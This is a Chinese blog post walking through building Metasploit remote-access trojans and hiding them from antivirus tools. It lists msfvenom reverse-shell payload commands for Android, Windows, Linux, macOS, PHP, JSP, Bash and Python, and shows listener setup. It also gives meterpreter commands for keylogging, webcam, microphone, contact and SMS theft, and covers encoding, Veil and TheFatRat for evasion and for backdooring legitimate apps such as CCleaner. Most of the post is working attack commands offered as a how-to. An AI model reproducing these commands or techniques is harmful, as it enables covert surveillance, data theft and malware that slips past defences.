MENU

msf生成远控木马及免杀初探

起因

上上一篇文章:WinRAR 目录穿越漏洞 - CVE-2018-20250 复现第一次接触到了ngrok,对远控突然来了兴趣

这篇文章我们将实现在正常的App或exe上绑定一个远控木马,并躲过火绒+360卫士+360杀毒+腾讯手机管家的查杀

环境准备

  • Win 10物理机+火绒最新版+Virtualbox的Kali 2019.1
  • Win 7SP1虚拟机+360杀毒最新版
  • 红米2(对没错很古老了14年的手机,但是没办法只有这么一台备用机)+腾讯手机管家
  • 这里本来应该下载一个App的,但是试了好几个App,msfvenom都不能反编译成功,先用默认模块

本来要使用360安全卫士国际版+360杀毒最新版的搭配的,但是先安装了杀毒再安装卫士的时候居然弹出了一个弹框:

真是相爱相杀啊,于是这里就只用了360杀毒

可能在生成payloadmsf会提示你:

Error: zipalign not found. If it's not in your PATH, please add it

那么你可以先安装一下这个zipalign工具:

sudo apt-get install zipalign -y

免杀工具:

实战

至于ngrok代理网站的注册,购买(或免费使用)请参照开头的文章,这里不再重复,我们继续用上次被坑了10块买的付费隧道

开启隧道监听

norok客户端官方下载地址下载客户端解压进入文件夹执行:

./sunny clientid 隧道id

不加免杀生成Payload

msfvenom -p android/meterpreter/reverse_tcp LHOST=你的ngrok域名 LPORT=你的域名后面的端口 -o /root/anti-antiVirus.apk
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的ngrok域名 LPORT=你的域名后面的端口 -o /root/anti-antiVirus.exe

有大佬也推荐windows/meterpreter/reverse_tcp_rc4这个payload,对会话进行加密,增加免杀能力,感兴趣的可以自己试下。

其他的平台或语言的payload生成命令如下:

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
Asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
Aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

查杀结果如下:

火绒对apk报毒

360杀毒啥都没报

当然,这么多安全厂家盯着metasploit,不加免杀的赤裸裸的就被查杀很正常,但是没关系呀,你不是抓到了我吗?

咳咳,跑题了,虽然会被查杀但心急的我决定先看看效果(主要是先看下msf等待反弹shell的效果,后面写起来速度快点)

附上meterpreter的常用操作命令:

命令功能
keyscan_start开始键盘记录
keyscan_stop结束键盘记录
keyscan_dump下载键盘记录
record_mic录制声音(如果目标主机上有话筒的话)
screenshot截屏
webcam_chat查看摄像头接口
webcam_list查看摄像头列表
webcam_stream开启摄像头
webcam_snap隐秘拍照功能 -i num指定开启哪个摄像头
run vnc开启远程桌面
dump_contacts导出电话号码
dump_sms导出信息
可以输入?查看更多命令

安卓效果演示

传到手机上(先不要安装),启动msf,配置:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST kali的ip
set LPORT kali的端口
show options
exploit

在手机上安装apk提示有风险:

等待几秒钟Kali就连上了,接下来就可以操控手机了,我们这里尝试了几个:

当使用webcam_stream命令开启摄像头时,会在本地打开一个html开始观看,不知道是代理不给力还是我的热点不给力没成功看到:

然后我们再保存一下联系人和短信,可以看到成功保存:

我们用腾讯手机管家查杀一下木马,还是能识别出木马:

windows效果展示

传到Win7上(先不要点击),启动msf,配置:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST kali的ip
set LPORT kali的端口
show options
exploit

Win7不支持这个程序,我们继续往下看

使用自带免杀模块

使用-l选项来列出指定模块的所有可用资源(模块类型包括: payloads, encoders, nops, all)。

  • 查看有哪些可用的木马:msfvenom -l payloads
  • 查看有哪些指定的输出格式:msfvenom --heip-formats
  • 查看有哪些编码器可以使用:msfvenom -l encoders

我们直接查看excellentgood的:

最经典的就是x86/shikata_ga_nai,那么我们看一下这个能不能绑在apk上

msfvenom -p android/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=你的ngrok域名 LPORT=你的域名后面的端口 -o /root/shikata_ga_nai-antiVirus.apk

很遗憾,不能用来编码apk,那exe呢?

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ LHOST=你的ngrok域名 LPORT=你的域名后面的端口 -o /root/1_shikata_ga_nai-antiVirus.exe

参数解释:

-p:指定payload
–e:选择制定编码器
-i:编码次数
-b:去多余/坏字符
LHOST:你申请的ngrok服务器地址
LPORT:自定义的远程端口

那么为什么是12次呢?是大佬说12次效果最好,还有,编码次数对免杀效果没有太大影响,可以看到成功生成:

Win7依然运行不了,Win10物理机也运行不了。虽然能编码,但是运行不了也白搭

windows效果演示

总共有20个攻击模块,不同额模块有不同的编码方式来绕过杀毒软件的查杀。我这里用的是第15个模块,并且用的windows/meterpreter/reverse_tcp模块,效果如下:

火绒查杀结果如下:

使用veil编码免杀

网上的文章使用的版本大部分都是Veil-Evasion ,但是Veil-FrameworkGitHub主页写着:

Veil Evasion is no longer supported, use Veil 3.0!

所以我们使用Veil,我同步到了gitee,Kali下安装:

sudo apt-get install git -y
git clone https://gitee.com/soapffz/Veil.git
cd Veil/
./config/setup.sh --force --silent

持续安装不成功中

其他的安装方法可以看Readme.md:https://gitee.com/soapffz/Veil/blob/master/README.md

火绒查杀结果如下:

使用TheFatRat

安装:

git clone https://gitee.com/soapffz/TheFatRat
cd TheFatRat
chmod +x setup.sh && ./setup.sh

然后安装结束之前会让你选择是否要生成fatrat的终端快捷命令,选择y,然后你就可以通过输入fatrat快捷打开TheFatRat了:

很奇怪,我这里每次都会检测很长时间的网络,然后说我offline,但是又能进去:

安卓效果演示

我们选择5,进入Backdooring Original apk [Instagram, Line,etc] ,这个是用来在一个正常的apk上绑定后门的

进入之后一样的设置LHOST为你的ngrok域名,LPORT为你的远程端口:

我们需要先准备一个比较出名的但是比较老的版本,比如clean Master3.3, CCleaner1.6,参考来源:https://github.com/Screetsec/TheFatRat/issues/328,不然你就会像我这样:

ccleaner for android 历史版本下载(需翻墙):https://ccleaner.cn.uptodown.com/android/old

我这里下载了一个1.16.62版本的:

[][35]

windows效果演示

参考文章:

最后编辑于: 2019 年 09 月 05 日
添加新评论

已有 3 条评论
  1. 这个你用着掉线么,我用着总掉线,没有其他远控稳定。。

    1. @左岸嗯,我的也不稳定,总是容易掉线,其他远控求推荐

    2. @adminspynote用着不错呢,很稳定